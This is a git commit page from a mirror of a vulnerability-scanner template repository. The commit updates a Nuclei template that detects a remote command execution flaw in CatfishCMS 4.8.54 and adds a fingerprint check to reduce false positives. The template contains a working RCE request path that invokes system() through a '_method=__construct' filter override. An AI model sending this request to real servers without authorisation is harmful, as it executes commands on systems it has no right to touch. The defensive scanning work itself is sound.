daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix FP CNVD-2019-06255.yaml

patch-1
Ritik Chaddha 2024-04-22 13:38:07 +05:30 committed by GitHub
parent ac2eb7981e
commit 865b7b75d4
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 20 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
http/cnvd/2019/CNVD-2019-06255.yaml
View File

@ -1,10 +1,11 @@
id: CNVD-2019-06255
info:
name: CatfishCMS RCE
name: CatfishCMS - Remote Command Execution
author: Lark-Lab
severity: critical
description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
description: |
CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
remediation: Upgrade to CatfishCMS version 4.8.54 or later.
reference:
- https://its401.com/article/yun2diao/91344725
@ -17,17 +18,25 @@ info:
max-request: 1
tags: cnvd,cnvd2019,rce,catfishcms
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
internal: true
words:
- 'content="Catfish CMS'
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'OS'
@ -35,4 +44,8 @@ http:
- 'SHELL'
- 'USER'
condition: and
# digest: 4a0a0047304502204d8e0b5798f1c1e3c13e8ef2c3b424eec1f93d1849e00deeaaacc6d20f1e3723022100e969db4fef4076f7b5d8ef17b9ed9000685af5228ae0c406796a7c75ff5275ef:922c64590222798bb761d5b6d8e72950
- type: status
status:
- 200
# digest: 4a0a0047304502204d8e0b5798f1c1e3c13e8ef2c3b424eec1f93d1849e00deeaaacc6d20f1e3723022100e969db4fef4076f7b5d8ef17b9ed9000685af5228ae0c406796a7c75ff5275ef:922c64590222798bb761d5b6d8e72950